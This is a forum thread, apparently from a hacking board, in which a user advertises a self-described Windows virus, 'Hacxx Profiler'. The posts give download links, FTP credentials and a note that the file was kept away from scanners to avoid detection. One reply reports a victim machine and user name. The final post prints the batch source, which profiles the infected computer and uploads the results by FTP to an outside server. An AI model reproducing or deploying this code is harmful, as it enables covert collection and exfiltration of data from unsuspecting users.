Autor |
Mensaje (Ver Versión para Imprimir)
|
Mensajes:
Registrad@: 08/05/2017
Estado: Desconectad@ |
Hacxx Profiler - Computer profile virus
Hacxx Profiler is a windows virus that i have developed that creates a text file with the profile for the machine and upload by ftp to a protected server.
The user can view and download all the logs created with this program by visiting the server.
[code>
http://uploaded.net
Username: 16834486
Password: i3e6by88
[/code>
Download:
http://ul.to/29vhjp3q/Hacxx_Profiler.zip
Virus Scan:
This file was not send to avoid further detection
Note:
[list>
[*> PM Me if you want the source code.
[*> The file only runs if extracted and executed outside the zip file on a Windows machine.
[/list> |
29/10/2019 19:05:22 | |
Mensajes:
Registrad@: 08/05/2017
Estado: Desconectad@ |
RE: Hacxx Profiler - Computer profile virus
1 computer executed the program
Computer: DAVID-PC
User: David
Download Research
http://ul.to/tmjnsel7 |
31/10/2019 17:41:37 | |
Mensajes:
Registrad@: 08/05/2017
Estado: Desconectad@ |
Hacxx Profiler [Source code]
Hacxx Profiler [Source code>
ftp.bat
CÓDIGO |
@ftp -i -s:"%~f0"&GOTO:EOF
open ftp.uploaded.net
16834486
i3e6by88
binary
put "c:\windows\temp\*.txt"
disconnect
bye
|
main.bat
CÓDIGO |
@ECHO OFF
REM QBFC Project Options Begin
REM HasVersionInfo: Yes
REM Companyname: Microtech, LLC
REM Productname: Hacxx Profiler
REM Filedescription:
REM Copyrights:
REM Trademarks:
REM Originalname:
REM Comments:
REM Productversion: 1. 0. 0. 0
REM Fileversion: 1. 0. 0. 0
REM Internalname:
REM Appicon: Profile.ico
REM AdministratorManifest: No
REM Embeddedfile: PTProfiler.exe
REM Embeddedfile: ftp.bat
REM QBFC Project Options End
@ECHO ON
%MYFILES%\PTProfiler.exe /save c:\windows\temp\%userdomain%-%username%-profile.txt
%MYFILES%\ftp.bat
|
Profile.ico
PTProfiler.exe
Download:
https://uploadrar.com/zti8hq36m34w/Hacxx_Profiler_-_source.rar |
17/11/2019 23:06:25 | |